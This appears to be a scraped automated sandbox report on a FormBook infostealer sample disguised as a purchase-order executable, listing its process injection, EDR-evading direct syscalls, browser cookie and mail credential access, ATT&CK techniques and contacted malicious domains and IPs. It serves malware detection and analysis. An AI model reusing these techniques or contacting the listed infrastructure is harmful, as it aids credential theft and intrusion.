        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E0BCD mov eax, dword ptr fs:[00000030h]3_2_015E0BCD
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166CBF0 mov eax, dword ptr fs:[00000030h]3_2_0166CBF0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160EBFC mov eax, dword ptr fs:[00000030h]3_2_0160EBFC
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01600BCB mov eax, dword ptr fs:[00000030h]3_2_01600BCB
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01600BCB mov eax, dword ptr fs:[00000030h]3_2_01600BCB
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01600BCB mov eax, dword ptr fs:[00000030h]3_2_01600BCB
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E8BF0 mov eax, dword ptr fs:[00000030h]3_2_015E8BF0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E8BF0 mov eax, dword ptr fs:[00000030h]3_2_015E8BF0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E8BF0 mov eax, dword ptr fs:[00000030h]3_2_015E8BF0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168EBD0 mov eax, dword ptr fs:[00000030h]3_2_0168EBD0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01694BB0 mov eax, dword ptr fs:[00000030h]3_2_01694BB0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01694BB0 mov eax, dword ptr fs:[00000030h]3_2_01694BB0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0BBE mov eax, dword ptr fs:[00000030h]3_2_015F0BBE
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0BBE mov eax, dword ptr fs:[00000030h]3_2_015F0BBE
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0A5B mov eax, dword ptr fs:[00000030h]3_2_015F0A5B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0A5B mov eax, dword ptr fs:[00000030h]3_2_015F0A5B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168EA60 mov eax, dword ptr fs:[00000030h]3_2_0168EA60
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161CA6F mov eax, dword ptr fs:[00000030h]3_2_0161CA6F
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161CA6F mov eax, dword ptr fs:[00000030h]3_2_0161CA6F
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161CA6F mov eax, dword ptr fs:[00000030h]3_2_0161CA6F
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E6A50 mov eax, dword ptr fs:[00000030h]3_2_015E6A50
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E6A50 mov eax, dword ptr fs:[00000030h]3_2_015E6A50
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E6A50 mov eax, dword ptr fs:[00000030h]3_2_015E6A50
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E6A50 mov eax, dword ptr fs:[00000030h]3_2_015E6A50
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E6A50 mov eax, dword ptr fs:[00000030h]3_2_015E6A50
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E6A50 mov eax, dword ptr fs:[00000030h]3_2_015E6A50
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E6A50 mov eax, dword ptr fs:[00000030h]3_2_015E6A50
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165CA72 mov eax, dword ptr fs:[00000030h]3_2_0165CA72
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165CA72 mov eax, dword ptr fs:[00000030h]3_2_0165CA72
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161CA24 mov eax, dword ptr fs:[00000030h]3_2_0161CA24
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160EA2E mov eax, dword ptr fs:[00000030h]3_2_0160EA2E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01604A35 mov eax, dword ptr fs:[00000030h]3_2_01604A35
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01604A35 mov eax, dword ptr fs:[00000030h]3_2_01604A35
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161CA38 mov eax, dword ptr fs:[00000030h]3_2_0161CA38
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166CA11 mov eax, dword ptr fs:[00000030h]3_2_0166CA11
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E0AD0 mov eax, dword ptr fs:[00000030h]3_2_015E0AD0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161AAEE mov eax, dword ptr fs:[00000030h]3_2_0161AAEE
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161AAEE mov eax, dword ptr fs:[00000030h]3_2_0161AAEE
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01636ACC mov eax, dword ptr fs:[00000030h]3_2_01636ACC
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01636ACC mov eax, dword ptr fs:[00000030h]3_2_01636ACC
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01636ACC mov eax, dword ptr fs:[00000030h]3_2_01636ACC
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01614AD0 mov eax, dword ptr fs:[00000030h]3_2_01614AD0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01614AD0 mov eax, dword ptr fs:[00000030h]3_2_01614AD0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01636AA4 mov eax, dword ptr fs:[00000030h]3_2_01636AA4
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EEA80 mov eax, dword ptr fs:[00000030h]3_2_015EEA80
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EEA80 mov eax, dword ptr fs:[00000030h]3_2_015EEA80
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtOpenKeyEx: Direct from: 0x77383C9CJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtClose: Direct from: 0x77382B6C
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtQueryValueKey: Direct from: 0x77382BECJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
        Injects a PE file into a foreign processes
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeMemory written: C:\Users\user\Desktop\Purchase Order_20240528.exe base: 400000 value starts with: 4D5AJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: NULL target: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: NULL target: C:\Windows\SysWOW64\nslookup.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: NULL target: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: NULL target: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Windows\SysWOW64\nslookup.exeThread register set: target process: 644Jump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Windows\SysWOW64\nslookup.exeThread APC queued: target process: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess created: C:\Users\user\Desktop\Purchase Order_20240528.exe "C:\Users\user\Desktop\Purchase Order_20240528.exe"Jump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeProcess created: C:\Windows\SysWOW64\nslookup.exe "C:\Windows\SysWOW64\nslookup.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000002.4538343573.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000000.2133422520.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000000.2286187191.00000000010C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
        Source: qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000002.4538343573.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000000.2133422520.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000000.2286187191.00000000010C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000002.4538343573.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000000.2133422520.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000000.2286187191.00000000010C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000002.4538343573.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000000.2133422520.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000000.2286187191.00000000010C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeQueries volume information: C:\Users\user\Desktop\Purchase Order_20240528.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000003.00000002.2210026041.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4539900115.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4539802866.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.4541673061.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.4538883092.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2213803816.0000000001900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\nslookup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\nslookup.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000003.00000002.2210026041.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4539900115.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4539802866.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.4541673061.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.4538883092.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2213803816.0000000001900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        DLL Side-Loading        		412
        Process Injection        		1
        Masquerading        		1
        OS Credential Dumping        		21
        Security Software Discovery        		Remote Services1
        Email Collection        		1
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        Abuse Elevation Control Mechanism        		1
        Disable or Modify Tools        		LSASS Memory2
        Process Discovery        		Remote Desktop Protocol1
        Archive Collected Data        		3
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading        		41
        Virtualization/Sandbox Evasion        		Security Account Manager41
        Virtualization/Sandbox Evasion        		SMB/Windows Admin Shares1
        Data from Local System        		4
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture4
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets1
        System Network Configuration Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Abuse Elevation Control Mechanism        		Cached Domain Credentials2
        File and Directory Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
        Obfuscated Files or Information        		DCSync13
        System Information Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
        Software Packing        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        DLL Side-Loading        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1448264 Sample: Purchase Order_20240528.exe Startdate: 28/05/2024 Architecture: WINDOWS Score: 100 28 www.vpachurch.org.uk 2->28 30 www.shortput.top 2->30 32 20 other IPs or domains 2->32 44 Snort IDS alert for network traffic 2->44 46 Multi AV Scanner detection for domain / URL 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 10 other signatures 2->50 10 Purchase Order_20240528.exe 3 2->10         started        signatures3 process4 signatures5 62 Injects a PE file into a foreign processes 10->62 13 Purchase Order_20240528.exe 10->13         started        process6 signatures7 64 Maps a DLL or memory area into another process 13->64 16 qFrNDyfVqdmmFLBeyXwBmuB.exe 13->16 injected process8 signatures9 40 Uses nslookup.exe to query domains 16->40 42 Found direct / indirect Syscall (likely to bypass EDR) 16->42 19 nslookup.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 2 other signatures 19->58 22 qFrNDyfVqdmmFLBeyXwBmuB.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.shortput.top 203.161.43.227, 49741, 49742, 49743 VNPT-AS-VNVNPTCorpVN Malaysia 22->34 36 betopfloor.com 108.179.192.228, 49753, 49754, 49755 UNIFIEDLAYER-AS-1US United States 22->36 38 11 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Purchase Order_20240528.exe42%VirustotalBrowse
        Purchase Order_20240528.exe26%ReversingLabsByteCode-MSIL.Trojan.CrypterX
        Purchase Order_20240528.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        vpachurch.org.uk9%VirustotalBrowse
        www.shopnaya.fr0%VirustotalBrowse
        mavonorm-global.uk0%VirustotalBrowse
        betopfloor.com0%VirustotalBrowse
        adhdphotography.com0%VirustotalBrowse
        www.home-stroi0m.ru1%VirustotalBrowse
        www.mavonorm-global.uk1%VirustotalBrowse
